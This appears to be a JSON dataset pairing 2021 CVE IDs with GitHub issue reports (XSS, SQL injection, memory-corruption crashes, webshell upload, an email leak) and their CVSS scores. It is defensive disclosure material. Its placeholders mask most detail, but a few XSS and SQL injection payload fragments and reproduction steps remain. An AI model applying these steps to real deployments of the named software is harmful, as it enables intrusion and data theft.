  68374. "Issue_Created_At": "2020-10-21T08:15:04Z",
  68375. "description": "Cross Site Scripting Vulnerability on URLTAG Although the CMS has protection mechanisms, after testing the protection is not comprehensive enough, like this URLTAG url FILETAG",
  68376. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  68377. "severity": "MEDIUM",
  68378. "baseScore": 6.1,
  68379. "impactScore": 2.7,
  68380. "exploitabilityScore": 2.8
  68381. },
  68382. {
  68383. "CVE_ID": "CVE-2021-35283",
  68384. "Issue_Url_old": "https://github.com/atoms183/CMS/issues/1",
  68385. "Issue_Url_new": "https://github.com/atoms183/cms/issues/1",
  68386. "Repo_new": "atoms183/cms",
  68387. "Issue_Created_At": "2021-06-09T05:44:41Z",
  68388. "description": "product_ FILETAG SQL injection. product_ FILETAG There is SQL injection in line NUMBERTAG CODETAG Just submit the following post request APITAG FILETAG post : query=a",
  68389. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  68390. "severity": "CRITICAL",
  68391. "baseScore": 9.8,
  68392. "impactScore": 5.9,
  68393. "exploitabilityScore": 3.9
  68394. },
  68395. {
  68396. "CVE_ID": "CVE-2021-35306",
  68397. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/615",
  68398. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/615",
  68399. "Repo_new": "axiomatic-systems/bento4",
  68400. "Issue_Created_At": "2021-06-10T13:16:05Z",
  68401. "description": "SEGV in mp NUMBERTAG aac. Hello, A SEGV has occurred when running program mp NUMBERTAG aac\uff0c System info\uff1a Ubuntu NUMBERTAG clang NUMBERTAG gcc NUMBERTAG Bento4 version NUMBERTAG FILETAG Verification steps\uff1a APITAG the source code of Bento4 APITAG APITAG NUMBERTAG run mp NUMBERTAG aac APITAG Output APITAG APITAG output ERRORTAG",
  68402. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  68403. "severity": "MEDIUM",
  68404. "baseScore": 6.5,
  68405. "impactScore": 3.6,
  68406. "exploitabilityScore": 2.8
  68407. },
  68408. {
  68409. "CVE_ID": "CVE-2021-35307",
  68410. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/616",
  68411. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/616",
  68412. "Repo_new": "axiomatic-systems/bento4",
  68413. "Issue_Created_At": "2021-06-10T14:10:25Z",
  68414. "description": "SEGV in mp NUMBERTAG aac. Hello, A SEGV has occurred when running program mp NUMBERTAG aac\uff0c System info\uff1a Ubuntu NUMBERTAG clang NUMBERTAG gcc NUMBERTAG Bento4 version NUMBERTAG FILETAG Verification steps\uff1a APITAG the source code of Bento4 APITAG APITAG NUMBERTAG run mp NUMBERTAG aac APITAG Output APITAG APITAG output ERRORTAG",
  68415. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  68416. "severity": "MEDIUM",
  68417. "baseScore": 6.5,
  68418. "impactScore": 3.6,
  68419. "exploitabilityScore": 2.8
  68420. },
  68421. {
  68422. "CVE_ID": "CVE-2021-35323",
  68423. "Issue_Url_old": "https://github.com/bludit/bludit/issues/1327",
  68424. "Issue_Url_new": "https://github.com/bludit/bludit/issues/1327",
  68425. "Repo_new": "bludit/bludit",
  68426. "Issue_Created_At": "2021-05-27T17:35:01Z",
  68427. "description": "cross site script (xss) . Describe your problem I found a cross site scripting attack on the login page URLTAG cross site scripting is a vulnerability that allows an attacker to send malicious code(usually in javascript form) to another user Because a browser cannot know if the script should be trusted or not, it will execute the script in user context allowing the attacker to access any cookies or sessions tokens retained by the browser. Steps to reproduce the problem NUMBERTAG open login page URLTAG NUMBERTAG enter the username place admin\"> APITAG and enter password NUMBERTAG trigger the malicious javascript code Bludit version bludit NUMBERTAG PHP version PHP NUMBERTAG",
  68428. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  68429. "severity": "MEDIUM",
  68430. "baseScore": 6.1,
  68431. "impactScore": 2.7,
  68432. "exploitabilityScore": 2.8
  68433. },
  68434. {
  68435. "CVE_ID": "CVE-2021-35344",
  68436. "Issue_Url_old": "https://github.com/justdan96/tsMuxer/issues/432",
  68437. "Issue_Url_new": "https://github.com/justdan96/tsmuxer/issues/432",
  68438. "Repo_new": "justdan96/tsmuxer",
  68439. "Issue_Created_At": "2021-05-27T22:03:26Z",
  68440. "description": "heap buffer overflow in APITAG Hi, please see asan output and poc file below. Found by Cem Onat Karagun of Diesec As you can see on backtrace APITAG System info\uff1a APITAG To run APITAG after unzip: FILETAG APITAG Asan output: ERRORTAG",
  68441. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  68442. "severity": "CRITICAL",
  68443. "baseScore": 9.8,
  68444. "impactScore": 5.9,
  68445. "exploitabilityScore": 3.9
  68446. },
  68447. {
  68448. "CVE_ID": "CVE-2021-35346",
  68449. "Issue_Url_old": "https://github.com/justdan96/tsMuxer/issues/436",
  68450. "Issue_Url_new": "https://github.com/justdan96/tsmuxer/issues/436",
  68451. "Repo_new": "justdan96/tsmuxer",
  68452. "Issue_Created_At": "2021-05-27T22:06:00Z",
  68453. "description": "heap buffer overflow in APITAG Hi, please see asan output and poc file below. Found by Cem Onat Karagun of Diesec As you can see on backtrace APITAG System info\uff1a APITAG To run APITAG after unzip: FILETAG APITAG Asan output: ERRORTAG",
  68454. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  68455. "severity": "CRITICAL",
  68456. "baseScore": 9.8,
  68457. "impactScore": 5.9,
  68458. "exploitabilityScore": 3.9
  68459. },
  68460. {
  68461. "CVE_ID": "CVE-2021-35358",
  68462. "Issue_Url_old": "https://github.com/dotCMS/core/issues/20540",
  68463. "Issue_Url_new": "https://github.com/dotcms/core/issues/20540",
  68464. "Repo_new": "dotcms/core",
  68465. "Issue_Created_At": "2021-06-15T01:52:32Z",
  68466. "description": "Stored XSS in APITAG APITAG on APITAG Describe the bug Hi Team I found a small stored XSS in APITAG APITAG install: Docker: APITAG To Reproduce NUMBERTAG Login Admin panel NUMBERTAG Go to APITAG APITAG NUMBERTAG Click on APITAG new content NUMBERTAG Parameter: APITAG and APITAG NUMBERTAG Insert Payload Store XSS: \" APITAG foo / bar NUMBERTAG Click APITAG File' and BOOM XSS NUMBERTAG Save and refresh, stored XSS. Impact: Commonly includes transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Screenshots FILETAG FILETAG FILETAG FILETAG FILETAG FILETAG FILETAG Desktop (please complete the following information): OS: Win NUMBERTAG Browser Chrome: Version NUMBERTAG APITAG Build NUMBERTAG bit)",
  68467. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  68468. "severity": "MEDIUM",
  68469. "baseScore": 4.8,
  68470. "impactScore": 2.7,
  68471. "exploitabilityScore": 1.7
  68472. },
  68473. {
  68474. "CVE_ID": "CVE-2021-35360",
  68475. "Issue_Url_old": "https://github.com/dotCMS/core/issues/20541",
  68476. "Issue_Url_new": "https://github.com/dotcms/core/issues/20541",
  68477. "Repo_new": "dotcms/core",
  68478. "Issue_Created_At": "2021-06-15T04:00:37Z",
  68479. "description": "Reflected XSS Vulnerability on Docker: APITAG Describe the bug Hi Team I found small reflected xss APITAG install: Docker: APITAG To Reproduce NUMBERTAG Login Admin panel NUMBERTAG uln link1: APITAG /c/containers NUMBERTAG uln link2: APITAG /c/links NUMBERTAG insert payload: \"> APITAG NUMBERTAG para: 'SEARCH NUMBERTAG Boom XSS impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Screenshots xss link1: FILETAG xss link2: FILETAG Desktop (please complete the following information): OS: Win NUMBERTAG Browser Chrome: Version NUMBERTAG APITAG Build NUMBERTAG bit)",
  68480. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  68481. "severity": "MEDIUM",
  68482. "baseScore": 4.8,
  68483. "impactScore": 2.7,
  68484. "exploitabilityScore": 1.7
  68485. },
  68486. {
  68487. "CVE_ID": "CVE-2021-35438",
  68488. "Issue_Url_old": "https://github.com/phpipam/phpipam/issues/3351",
  68489. "Issue_Url_new": "https://github.com/phpipam/phpipam/issues/3351",
  68490. "Repo_new": "phpipam/phpipam",
  68491. "Issue_Created_At": "2021-06-18T07:44:36Z",
  68492. "description": "XSS (reflected) in IP calculator. version NUMBERTAG FILETAG PATHTAG / APITAG alert(/xss/) APITAG Input the POC into the IP calculator box and get an alert box",
  68493. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  68494. "severity": "MEDIUM",
  68495. "baseScore": 6.1,
  68496. "impactScore": 2.7,
  68497. "exploitabilityScore": 2.8
  68498. },
  68499. {
  68500. "CVE_ID": "CVE-2021-35452",
  68501. "Issue_Url_old": "https://github.com/strukturag/libde265/issues/298",
  68502. "Issue_Url_new": "https://github.com/strukturag/libde265/issues/298",
  68503. "Repo_new": "strukturag/libde265",
  68504. "Issue_Created_At": "2021-06-22T14:49:43Z",
  68505. "description": "SEGV in slice.cc. Hello, A SEGV has occurred when running program dec NUMBERTAG System info\uff1a Ubuntu NUMBERTAG clang NUMBERTAG gcc NUMBERTAG Dec NUMBERTAG FILETAG Verification steps\uff1a APITAG the source code of libde NUMBERTAG APITAG APITAG NUMBERTAG run dec NUMBERTAG without asan) APITAG Output ERRORTAG APITAG output ERRORTAG This issue will cause Denial of Service attacks",
  68506. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  68507. "severity": "MEDIUM",
  68508. "baseScore": 6.5,
  68509. "impactScore": 3.6,
  68510. "exploitabilityScore": 2.8
  68511. },
  68512. {
  68513. "CVE_ID": "CVE-2021-35513",
  68514. "Issue_Url_old": "https://github.com/mermaid-js/mermaid/issues/2122",
  68515. "Issue_Url_new": "https://github.com/mermaid-js/mermaid/issues/2122",
  68516. "Repo_new": "mermaid-js/mermaid",
  68517. "Issue_Created_At": "2021-06-08T17:31:30Z",
  68518. "description": "Antiscript option should remove javascript urls. Antiscript option should remove javascript urls",
  68519. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  68520. "severity": "MEDIUM",
  68521. "baseScore": 6.1,
  68522. "impactScore": 2.7,
  68523. "exploitabilityScore": 2.8
  68524. },
  68525. {
  68526. "CVE_ID": "CVE-2021-3575",
  68527. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1347",
  68528. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1347",
  68529. "Repo_new": "uclouvain/openjpeg",
  68530. "Issue_Created_At": "2021-04-30T00:10:00Z",
  68531. "description": "Heap buffer overflow in APITAG in sycc NUMBERTAG to_rgb. Hi, I found a vulnerability in current master NUMBERTAG bda NUMBERTAG URLTAG , and I also reproduced it on latest released version FILETAG . Crash Summary A heap buffer overflow in APITAG in sycc NUMBERTAG to_rgb, it can lead to heap based buffer overflow via a crafted APITAG file when decompress it. Crash Analysis There is improper check of APITAG . URLTAG APITAG FILETAG To reproduce NUMBERTAG Ubuntu NUMBERTAG with clang NUMBERTAG CODETAG ASAN report: ERRORTAG",
  68532. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  68533. "severity": "HIGH",
  68534. "baseScore": 7.8,
  68535. "impactScore": 5.9,
  68536. "exploitabilityScore": 1.8
  68537. },
  68538. {
  68539. "CVE_ID": "CVE-2021-3588",
  68540. "Issue_Url_old": "https://github.com/bluez/bluez/issues/70",
  68541. "Issue_Url_new": "https://github.com/bluez/bluez/issues/70",
  68542. "Repo_new": "bluez/bluez",
  68543. "Issue_Created_At": "2021-01-04T06:12:01Z",
  68544. "description": "Potential buffer out of bound read in gatt APITAG URLTAG ERRORTAG Both len and APITAG are unsigned and offset is an external input without validation. It seems like a malicious GATT client can cause out of bound read on memory locations after the given device_state::cli_feat pointer. Similar validation like below should be sufficient: URLTAG",
  68545. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  68546. "severity": "LOW",
  68547. "baseScore": 3.3,
  68548. "impactScore": 1.4,
  68549. "exploitabilityScore": 1.8
  68550. },
  68551. {
  68552. "CVE_ID": "CVE-2021-3596",
  68553. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/2624",
  68554. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/2624",
  68555. "Repo_new": "imagemagick/imagemagick",
  68556. "Issue_Created_At": "2020-09-25T05:56:46Z",
  68557. "description": "Null Pointer dereference caused by incomplete check of the return value from libxml2 in APITAG APITAG Prerequisites Y ] I have written a descriptive issue title [Y] I have verified that I am using the latest version of APITAG [Y] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported. Description APITAG There is a segmentation fault caused by the NPD in function APITAG APITAG in APITAG NUMBERTAG APITAG does not check the nullity of the pointer returned from libxml2 and dereferences it directly. This directly leads to program crashes and segmentation fault. Steps to Reproduce APITAG NUMBERTAG To ensure reproduction, I use a low level privilege user to use up space in the /tmp folder first NUMBERTAG Run: ~~~~ magick convert poc ./test.ps ~~~~ FILETAG (unzip first) Here is the trace reported by ASAN: ~~~~ ASAN:SIGSEGV APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG fec8c bp NUMBERTAG f NUMBERTAG sp NUMBERTAG ffd NUMBERTAG e NUMBERTAG c0 T NUMBERTAG fec8b in APITAG PATHTAG NUMBERTAG c8ba0c in APITAG PATHTAG NUMBERTAG dfbc1 in APITAG PATHTAG NUMBERTAG c8ba0c in APITAG PATHTAG NUMBERTAG c8ecbc in APITAG PATHTAG NUMBERTAG bfaef in APITAG PATHTAG NUMBERTAG fd NUMBERTAG in APITAG PATHTAG NUMBERTAG d in APITAG PATHTAG NUMBERTAG efd NUMBERTAG fa NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG APITAG NUMBERTAG ABORTING ~~~~ System Configuration APITAG ~~~~ PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG fopenmp Wall O0 g fsanitize=address mtune=broadwell fexceptions pthread DMAGICKCORE_HDRI_ENABLE NUMBERTAG DMAGICKCORE_QUANTUM_DEPTH NUMBERTAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib fontconfig freetype jng jp2 jpeg lzma png x xml zlib Environment APITAG system, version and so on): APITAG DISTRIB_RELEASE NUMBERTAG DISTRIB_CODENAME=xenial APITAG NUMBERTAG LTS\" Additional information: APITAG Here is the link toward function APITAG URLTAG APITAG APITAG",
  68558. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  68559. "severity": "MEDIUM",
  68560. "baseScore": 6.5,
  68561. "impactScore": 3.6,
  68562. "exploitabilityScore": 2.8
  68563. },
  68564. {
  68565. "CVE_ID": "CVE-2021-35970",
  68566. "Issue_Url_old": "https://github.com/coralproject/talk/issues/3600",
  68567. "Issue_Url_new": "https://github.com/coralproject/talk/issues/3600",
  68568. "Repo_new": "coralproject/talk",
  68569. "Issue_Created_At": "2021-06-28T08:37:55Z",
  68570. "description": "Severe Security Issue in Version NUMBERTAG E Mail Leak. I already contacted some maintainers privately about this, but they did not respond. That's why I'm now making this public. In Talk version NUMBERTAG it is very easy to query the e mail addresses of users without any authentication; thus, possibly revealing their true identities behind their pseudonyms. This is possible although the documentation states: > The primary email address of the user. Only accessible to Administrators or the current user. But in order to find out the e mail address of a user, you can e.g. simply send a APITAG APITAG query to the APITAG endpoint of the talk server \u00ad without any authentication. You can also query all e mail addresses with APITAG . I demand the maintainers ( MENTIONTAG , MENTIONTAG APITAG to merge the pull request URLTAG as soon as possible, and release version NUMBERTAG in the version NUMBERTAG branch.",
  68571. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  68572. "severity": "HIGH",
  68573. "baseScore": 7.5,
  68574. "impactScore": 3.6,
  68575. "exploitabilityScore": 3.9
  68576. },
  68577. {
  68578. "CVE_ID": "CVE-2021-3628",
  68579. "Issue_Url_old": "https://github.com/openkm/document-management-system/issues/278",
  68580. "Issue_Url_new": "https://github.com/openkm/document-management-system/issues/278",
  68581. "Repo_new": "openkm/document-management-system",
  68582. "Issue_Created_At": "2021-04-08T07:59:31Z",
  68583. "description": "Cross Site Scripting issue.",
  68584. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  68585. "severity": "MEDIUM",
  68586. "baseScore": 5.4,
  68587. "impactScore": 2.7,
  68588. "exploitabilityScore": 2.3
  68589. },
  68590. {
  68591. "CVE_ID": "CVE-2021-36383",
  68592. "Issue_Url_old": "https://github.com/vatesfr/xen-orchestra/issues/5712",
  68593. "Issue_Url_new": "https://github.com/vatesfr/xen-orchestra/issues/5712",
  68594. "Repo_new": "vatesfr/xen-orchestra",
  68595. "Issue_Created_At": "2021-04-05T22:34:39Z",
  68596. "description": "XEN Orchestra privilege escalation via websockets. Context XO origin : XO Appliance Versions : Node NUMBERTAG o web NUMBERTAG o server NUMBERTAG Expected behavior Permissions enforcement through websockets is not thoroughly checked and can lead to an unprivileged 'user' obtaining data only accessible by 'admin'. VMs, Backups, Audit, Users, Groups, etc. Current behavior The websockets that control the application API are allowing access to certain elements based purely on the response (which can be manipulated). This would be similar to an ecommerce application taking the price of a shopping cart from the DOM (which can be manipulated by the user) and starting the checkout process using this value. In this POC, the method APITAG FILETAG FILETAG FILETAG FILETAG FILETAG FILETAG FILETAG FILETAG",
  68597. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  68598. "severity": "MEDIUM",
  68599. "baseScore": 4.3,
  68600. "impactScore": 1.4,
  68601. "exploitabilityScore": 2.8
  68602. },
  68603. {
  68604. "CVE_ID": "CVE-2021-36408",
  68605. "Issue_Url_old": "https://github.com/strukturag/libde265/issues/299",
  68606. "Issue_Url_new": "https://github.com/strukturag/libde265/issues/299",
  68607. "Repo_new": "strukturag/libde265",
  68608. "Issue_Created_At": "2021-06-23T03:45:54Z",
  68609. "description": "Heap use after free in intrapred.h when decoding file. Hello, A Heap use after free has occurred when running program dec NUMBERTAG System info\uff1a Ubuntu NUMBERTAG clang NUMBERTAG gcc NUMBERTAG Dec NUMBERTAG FILETAG Verification steps\uff1a APITAG the source code of libde NUMBERTAG APITAG APITAG NUMBERTAG run dec NUMBERTAG APITAG asan info ERRORTAG",
  68610. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  68611. "severity": "MEDIUM",
  68612. "baseScore": 5.5,
  68613. "impactScore": 3.6,
  68614. "exploitabilityScore": 1.8
  68615. },
  68616. {
  68617. "CVE_ID": "CVE-2021-36409",
  68618. "Issue_Url_old": "https://github.com/strukturag/libde265/issues/300",
  68619. "Issue_Url_new": "https://github.com/strukturag/libde265/issues/300",
  68620. "Repo_new": "strukturag/libde265",
  68621. "Issue_Created_At": "2021-06-24T13:41:11Z",
  68622. "description": "There is an Assertion failed at sps.cc. Hello, There is an Assertion APITAG failed at APITAG in libde NUMBERTAG when decoding file. System info\uff1a Ubuntu NUMBERTAG clang NUMBERTAG gcc NUMBERTAG Dec NUMBERTAG FILETAG Verification steps\uff1a APITAG the source code of libde NUMBERTAG APITAG APITAG NUMBERTAG run dec NUMBERTAG APITAG Output ERRORTAG gdb info ERRORTAG",
  68623. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  68624. "severity": "HIGH",
  68625. "baseScore": 7.8,
  68626. "impactScore": 5.9,
  68627. "exploitabilityScore": 1.8
  68628. },
  68629. {
  68630. "CVE_ID": "CVE-2021-36410",
  68631. "Issue_Url_old": "https://github.com/strukturag/libde265/issues/301",
  68632. "Issue_Url_new": "https://github.com/strukturag/libde265/issues/301",
  68633. "Repo_new": "strukturag/libde265",
  68634. "Issue_Created_At": "2021-06-24T14:47:49Z",
  68635. "description": "stack buffer overflow in fallback motion.cc when decoding file. Hello, A stack buffer overflow has occurred when running program dec NUMBERTAG System info\uff1a Ubuntu NUMBERTAG clang NUMBERTAG gcc NUMBERTAG Dec NUMBERTAG FILETAG Verification steps\uff1a APITAG the source code of libde NUMBERTAG APITAG APITAG NUMBERTAG run dec NUMBERTAG APITAG asan info ERRORTAG",
  68636. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  68637. "severity": "MEDIUM",
  68638. "baseScore": 5.5,
  68639. "impactScore": 3.6,
  68640. "exploitabilityScore": 1.8
  68641. },
  68642. {
  68643. "CVE_ID": "CVE-2021-36411",
  68644. "Issue_Url_old": "https://github.com/strukturag/libde265/issues/302",
  68645. "Issue_Url_new": "https://github.com/strukturag/libde265/issues/302",
  68646. "Repo_new": "strukturag/libde265",
  68647. "Issue_Created_At": "2021-06-25T14:41:05Z",
  68648. "description": "A SEGV has occurred when running program dec NUMBERTAG Hello, A SEGV of deblock.cc in function APITAG has occurred when running program dec NUMBERTAG source code CODETAG Due to incorrect access control, a SEGV caused by a READ memory access occurred at line NUMBERTAG of the code. This issue can cause a Denial of Service attack. System info\uff1a Ubuntu NUMBERTAG clang NUMBERTAG gcc NUMBERTAG Dec NUMBERTAG FILETAG Verification steps\uff1a APITAG the source code of libde NUMBERTAG APITAG APITAG NUMBERTAG run dec NUMBERTAG without asan) APITAG Output ERRORTAG APITAG output ERRORTAG gdb info ERRORTAG",
  68649. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  68650. "severity": "MEDIUM",
  68651. "baseScore": 5.5,
  68652. "impactScore": 3.6,
  68653. "exploitabilityScore": 1.8
  68654. },
  68655. {
  68656. "CVE_ID": "CVE-2021-36412",
  68657. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1838",
  68658. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1838",
  68659. "Repo_new": "gpac/gpac",
  68660. "Issue_Created_At": "2021-07-03T03:57:55Z",
  68661. "description": "A heap buffer overflow in function APITAG Hello, A heap buffer overflow has occurred when running program APITAG; this can be reproduced on the latest commit. System info\uff1a Ubuntu NUMBERTAG clang NUMBERTAG gcc NUMBERTAG FILETAG Verification steps\uff1a APITAG the source code of gpac APITAG APITAG NUMBERTAG run APITAG APITAG asan info ERRORTAG source code of rtp_pck_mpeg NUMBERTAG c CODETAG",
  68662. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  68663. "severity": "HIGH",
  68664. "baseScore": 7.8,
  68665. "impactScore": 5.9,
  68666. "exploitabilityScore": 1.8
  68667. },
  68668. {
  68669. "CVE_ID": "CVE-2021-36414",
  68670. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1840",
  68671. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1840",
  68672. "Repo_new": "gpac/gpac",
  68673. "Issue_Created_At": "2021-07-05T12:32:43Z",
  68674. "description": "heap buffer overflow issue with gpac APITAG Hello, A heap buffer overflow has occurred when running program APITAG; it leads to a Denial of Service caused by a division by zero without a sanity check. This can be reproduced on the latest commit. System info\uff1a Ubuntu NUMBERTAG clang NUMBERTAG gcc NUMBERTAG FILETAG file: media.c APITAG line NUMBERTAG As the code below shows: CODETAG Verification steps\uff1a APITAG the source code of gpac APITAG APITAG NUMBERTAG run APITAG APITAG In Command line: ERRORTAG gdb info FILETAG asan info ERRORTAG",
  68675. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  68676. "severity": "HIGH",
  68677. "baseScore": 7.8,
  68678. "impactScore": 5.9,
  68679. "exploitabilityScore": 1.8
  68680. },
  68681. {
  68682. "CVE_ID": "CVE-2021-36417",
  68683. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1846",
  68684. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1846",
  68685. "Repo_new": "gpac/gpac",
  68686. "Issue_Created_At": "2021-07-07T03:09:17Z",
  68687. "description": "A heap buffer overflow has occurred in function gf_isom_dovi_config_get. Hello, A heap buffer overflow has occurred in function gf_isom_dovi_config_get of APITAG when running program APITAG; this can be reproduced on the latest commit. System info\uff1a Ubuntu NUMBERTAG clang NUMBERTAG gcc NUMBERTAG FILETAG Verification steps\uff1a APITAG the source code of gpac APITAG APITAG NUMBERTAG run APITAG APITAG command line ERRORTAG asan info ERRORTAG source code CODETAG",
  68688. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  68689. "severity": "HIGH",
  68690. "baseScore": 7.8,
  68691. "impactScore": 5.9,
  68692. "exploitabilityScore": 1.8
  68693. },
  68694. {
  68695. "CVE_ID": "CVE-2021-36440",
  68696. "Issue_Url_old": "https://github.com/star7th/showdoc/issues/1406",
  68697. "Issue_Url_new": "https://github.com/star7th/showdoc/issues/1406",
  68698. "Repo_new": "star7th/showdoc",
  68699. "Issue_Created_At": "2021-06-24T06:45:37Z",
  68700. "description": "File Upload vulnerability. A File Upload vulnerability was discovered in APITAG NUMBERTAG description The file_url parameter allows remote download of compressed files, and the files in the compressed package will be released to the web directory when decompressed Vulnerability file: PATHTAG ERRORTAG APITAG CODETAG zip File FILETAG",
  68701. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  68702. "severity": "CRITICAL",
  68703. "baseScore": 9.8,
  68704. "impactScore": 5.9,
  68705. "exploitabilityScore": 3.9
  68706. },
  68707. {
  68708. "CVE_ID": "CVE-2021-36454",
  68709. "Issue_Url_old": "https://github.com/NavigateCMS/Navigate-CMS/issues/24",
  68710. "Issue_Url_new": "https://github.com/navigatecms/navigate-cms/issues/24",
  68711. "Repo_new": "navigatecms/navigate-cms",
  68712. "Issue_Created_At": "2021-06-22T08:59:25Z",
  68713. "description": "Reflected XSS attack with navigate quickse parameter and affect many modules in APITAG NUMBERTAG EXPECTED BEHAVIOUR An authenticated malicious user can take advantage of a Reflected XSS vulnerability with navigate quickse parameter in URL and affect many modules. IMPACT Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. VULNERABILITY CODE I found the vulnerability code in many files. Because initial_url is built in these files. > PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG FILETAG After that initial_url is used in PATHTAG file to build HTML. FILETAG STEPS TO REPRODUCE NUMBERTAG We change the request and send the link to user CODETAG FILETAG NUMBERTAG People who already login and click to the link above NUMBERTAG When loading the page then the Reflected XSS is executed. FILETAG",
  68714. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  68715. "severity": "MEDIUM",
  68716. "baseScore": 5.4,
  68717. "impactScore": 2.7,
  68718. "exploitabilityScore": 2.3
  68719. },
  68720. {
  68721. "CVE_ID": "CVE-2021-36455",
  68722. "Issue_Url_old": "https://github.com/NavigateCMS/Navigate-CMS/issues/25",
  68723. "Issue_Url_new": "https://github.com/navigatecms/navigate-cms/issues/25",
  68724. "Repo_new": "navigatecms/navigate-cms",
  68725. "Issue_Created_At": "2021-06-26T09:25:58Z",
  68726. "description": "SQL injection UNION attack with quicksearch parameter in APITAG NUMBERTAG EXPECTED BEHAVIOUR An authenticated malicious user can take advantage of a SQL injection UNION attack vulnerability with the quicksearch parameter in the URL. IMPACT A successful SQL injection attack may result in the unauthorized viewing of user lists, the deletion of entire tables and, in certain cases, the attacker gaining administrative rights to the database, all of which are highly detrimental to a business. VULNERABILITY CODE I found that the quicksearch parameter is not sanitized before being used in the SQL query's WHERE clause in PATHTAG FILETAG and the protect function in PATHTAG does not use ESCAPE to filter special characters FILETAG It is then used in the query in: PATHTAG FILETAG STEPS TO REPRODUCE NUMBERTAG We change the request in the URL ERRORTAG NUMBERTAG and can then extract all the data. FILETAG",
  68727. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  68728. "severity": "HIGH",
  68729. "baseScore": 8.8,
  68730. "impactScore": 5.9,
  68731. "exploitabilityScore": 2.8
  68732. },
  68733. {
  68734. "CVE_ID": "CVE-2021-36461",
  68735. "Issue_Url_old": "https://github.com/microweber/microweber/issues/751",
  68736. "Issue_Url_new": "https://github.com/microweber/microweber/issues/751",
  68737. "Repo_new": "microweber/microweber",
  68738. "Issue_Created_At": "2021-06-26T02:24:23Z",
  68739. "description": "microweber NUMBERTAG has an authenticated back-end file upload vulnerability that allows an attacker to obtain a web shell (getshell). FILETAG This PDF file describes the vulnerability in detail",
  68740. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  68741. "severity": "HIGH",
